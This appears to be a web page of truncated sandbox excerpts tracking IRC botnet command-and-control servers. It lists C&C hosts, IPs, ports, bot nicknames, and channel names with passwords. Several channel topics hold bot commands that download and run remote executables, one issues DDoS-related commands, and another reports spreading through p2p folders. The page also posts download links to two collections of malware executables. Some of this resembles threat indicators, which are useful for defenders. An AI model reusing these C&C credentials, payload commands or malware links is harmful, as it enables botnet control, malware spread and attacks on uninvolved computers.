Resolved : [java.KUTLUFAMILY.COM] To [178.211.56.105] Resolved : [java.KUTLUFAMILY.COM] To [178.211.56.104] Remote Host Port Number 178.211.56.104 81 ircd here 74.206.242.164 80 NICK [N00_USA_XP_3401546]` PRIVMSG [N00_USA_XP_3401 @ :scan; Sequential Port Scan started on 174.133.89.0:445 with a delay of 5 seconds for 0 minutes using 10 threads. @ :scan; Random Port Scan started on 174.x.x.x:445 with a delayRead more...
cobain.sdeirc.net (botnet hosted in Turkey Radore Hosting Telekomunikasyon Hizmetleri San. Ve Tic. Ltd. Sti)
cobain.sdeirc.net DNS_TYPE_A 46.243.8.6 46.243.8.6:4747 Nick: {SwarM}{AUT}{N}405701 Username: 8682 Joined Channel: #CoBaIN with Password GOFK12 infos about hosting: http://whois.domaintools.com/178.211.56.104
around 24 mb exe files
another malwares collection around 24 mb here download link: http://e0cc6bdb.theseforums.com
mx207.BLOGSHOTS.ORG(botnet hosted in United States Chicago Hostforweb Inc)
DNS Lookup Host Name IP Address dell-d3e62f7e26 10.1.7.2 api.albertoshistory.info 73.189.217.224 205.234.144.207 205.234.144.207 astro.ic.ac.uk 155.198.204.78 ale.pakibili.com 208.73.210.29 versatek.com 74.86.204.212 journalofaccountancy.com 64.154.62.195 transnationale.org 85.31.209.210 mas.0730ip.com 69.43.160.174 stayontime.info 42.247.18.99 www.shearman.com 167.68.29.184 insidehighered.com 69.20.66.11 ate.lacoctelera.net 89.17.206.141 websitetrafficspy.com 178.77.123.35 qun.51.com 114.80.89.36 summer-uni-sw.eesp.ch 193.134.218.137 shopstyle.com 74.201.151.180 xxx.stopklatka.pl unclefed.com 209.50.238.18 mcsp.lvengine.com deirdremccloskey.org 173.236.188.113 journals.lww.com 160.109.108.154 middleastpost.org 74.52.145.82 mas.archivum.info scribbidyscrubs.com 199.89.247.25 mas.mtime.com 59.151.32.20Read more...
dc.studyingcenter-org.com(botnet hosted in China Beijing Chinanet Hebei Province Network)
dc.studyingcenter-org.com 123.183.217.32 dc.tvteam.info dc.babypin.net Outgoing connection to remote server: dc.studyingcenter-org.com TCP port 5943 Outgoing connection to remote server: dc.studyingcenter-org.com TCP port 5943 Outgoing connection to remote server: dc.studyingcenter-org.com TCP port 5943 Outgoing connection to remote server: dc.studyingcenter-org.com TCP port 5943 Registry Changes by all processes Create or Open Changes HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon “Taskman” = c:RECYCLERR-1-5-21-1482476501-1644491937-682003330-1013winfixer.exe ReadsRead more...
bnet.doesntexist.org(botnet hosted in Ecuador Quito Puntonet S.a)
DNS Lookup Host Name IP Address xeonbox.homeip.net 200.105.228.106 webcache.dyndns.info 127.0.0.1 bnet.doesntexist.org 200.105.228.106 Outgoing connection to remote server: xeonbox.homeip.net TCP port 8888 Outgoing connection to remote server: webcache.dyndns.info TCP port 8888 Outgoing connection to remote server: xeonbox.homeip.net TCP port 8888 Remote Host Port Number 174.132.221.20 80 200.105.228.106 8888 NICK usr331420 USER root 8 * : someRead more...
urcdw.zavoddebila.com(botnet hosted in United States Fullerton Staminus Communications)
urcdw.zavoddebila.com DNS_TYPE_A 72.20.14.38 72.20.14.38:33333 Nick: {NOVA}[USA][XP-SP3]610119 Username: VirUs VirUs “” “lol” :My_Name_iS_PIG_and_Iam_A_GaY Joined Channel: ##Turb0-XXX## PRIVMSG #d4 :Done.. PRIVMSG #d2 :Done.. Channel Topic for Channel ##Turb0-XXX##: “!NAZELturbo http://thenaturemedia.in/install.48691.exe ifasfa264.exe | !NAZELturbo http://7arhive.com/setup585.exe afasfa4.exe | !NAZELturbo http://img103.herosh.com/2011/02/09/666929080.gif fsaf24.exe | !NAZELturbo http://img104.herosh.com/2011/02/08/547715969.gif micro1.exe” Private Message to Channel ##Turb0-XXX##: “Executed process “fsaf24.exe”.” Private Message to Channel ##Turb0-XXX##: “DownloadRead more...
m3rcil3ss.co.cc(botnet hosted in Turkey Netinternet-net)
m3rcil3ss.co.cc DNS_TYPE_A 212.252.34.199 212.252.34.199:6667 Nick: [AUS|XP|620207] Username: onfkyav Server Pass: m3rc Joined Channel: #m3rc with Password kxfcrt Channel Topic for Channel #m3rc: “.p2p” Private Message to Channel #m3rc: “[p2p]: Spreading to p2p folders.” Set by ccc on Tue Dec 28 08:36:24 Private Message to User [AUS|XP|620207]: “VERSION” Now talking in #2k38 Process Created: Topic isRead more...
pantylost.mooo.com( botnet hosted in China Beijing Chinanet Gansu Province Networ
Botnet C&C irc pantylost.mooo.com ip: 60.165.98.198 marinehh.twilightparadox.com ip: 60.165.98.198 stockingag.jumpingcrab.com ip: 60.165.98.198 pantylost.crabdance.com ip: 60.165.98.198 addr: onthebreak.UglyAs.com ip: 60.165.98.198 headmefc.AsSexyAs.com ip: 60.165.98.198 computercc.ignorelist.com ip: 60.165.98.198 sandtp.chickenkiller.com ip: 60.165.98.198 greenbarc.IsTheBe.st ip: 60.165.98.198 ringc.strangled.net ip: 60.165.98.198 60.165.98.198:8684 NICK [N00_USA_XP_39922187] USER SP2-917 * 0 :COMPUTERNAME Now talking in #blue3 Topic is ‘|.ddosstop -s|.stop -s|.patcher http://58.240.104.57:9008/logo.gif 0 -s|.shttp ftp://ccc:1@60.10.179.100:6054/282.gifRead more...
around 52 mb exe files
Here another malware package around 52 mb inside u have multiple malwares Downaload: http://0b975bb5.tinylinks.co